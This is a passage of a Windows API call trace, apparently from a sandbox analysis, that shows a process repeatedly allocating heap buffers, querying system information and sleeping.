[0214.222] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.222] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.223] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.223] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.223] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.224] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.224] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.224] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.224] Sleep (dwMilliseconds=0x110) [0214.258] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.258] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.259] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.259] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.259] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.259] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.259] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.259] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.260] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.260] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.260] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.261] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.261] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.261] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.261] Sleep (dwMilliseconds=0x110) [0214.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.281] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.294] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.294] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.295] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.299] Sleep (dwMilliseconds=0x110) [0214.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.316] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.317] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.317] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.318] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.318] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.318] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.318] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.319] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.319] Sleep (dwMilliseconds=0x110) [0214.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.329] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.332] Sleep (dwMilliseconds=0x110) [0214.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.364] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.364] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.365] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.365] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.366] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.366] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.366] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.367] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.367] Sleep (dwMilliseconds=0x110) [0214.400] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.400] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.401] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.401] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.401] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.401] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.401] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.401] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.402] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.402] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.403] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.404] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.404] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.405] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.405] Sleep (dwMilliseconds=0x110) [0214.434] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.435] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.435] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.435] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.435] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.436] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.436] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.436] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.437] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.437] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.438] Sleep (dwMilliseconds=0x110) [0214.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.457] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.458] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.458] Sleep (dwMilliseconds=0x110) [0214.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.471] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.472] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.472] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.472] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.473] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.474] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.474] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.474] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.475] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.475] Sleep (dwMilliseconds=0x110) [0214.485] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.489] Sleep (dwMilliseconds=0x110) [0214.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.505] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.505] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.506] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.506] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.506] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.506] Sleep (dwMilliseconds=0x110) [0214.516] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.516] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.517] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.520] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.521] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.521] Sleep (dwMilliseconds=0x110) [0214.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0214.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0214.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0214.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.536] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0214.536] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0214.537] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.537] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0214.537] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0214.537] Sleep (dwMilliseconds=0x110) [0214.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0214.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, 